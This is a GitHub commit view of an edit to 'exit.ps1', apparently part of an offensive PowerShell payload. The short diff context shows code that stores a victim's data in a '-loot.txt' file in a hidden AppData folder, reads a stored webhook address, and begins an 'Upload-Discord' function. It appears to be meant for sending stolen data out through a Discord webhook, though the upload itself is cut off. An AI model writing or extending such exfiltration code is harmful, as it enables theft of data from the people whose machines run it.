Update exit.ps1

This commit is contained in:
I-Am-Jakoby 2022-12-26 22:49:34 -06:00 committed by GitHub
parent c3b01dfc48
commit d42311b22c
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -3,6 +3,8 @@ Add-Type -AssemblyName PresentationCore,PresentationFramework
$Path="$env:appdata\-locker\$env:UserName-loot.txt"
$dc = (Get-Content "$env:appdata\-locker\wh.txt" -TotalCount 1)
function Upload-Discord {
[CmdletBinding()]